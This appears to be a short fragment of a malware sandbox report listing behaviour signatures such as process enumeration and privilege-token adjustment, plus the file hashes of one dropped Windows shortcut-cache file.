        sig: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5: 8fef5645ac7250580d23b10c8a777ffc
    SHA1: cd3aa2da88aa658ba0c48e707c89f242bcec5043
    SHA256: fd0c3e62f5e616e4f1b62faada33ff626e3f7f646e814a4b1675abb1068585f1
    SHA512: 3de2c2c044bd529872deac4052ec4d5fa4d3f108cb9250c94a4b1e32f03730ff3d8eca426f6be6c5582d4b63ca428c3e002247af61039248709c615aaf4a2c8e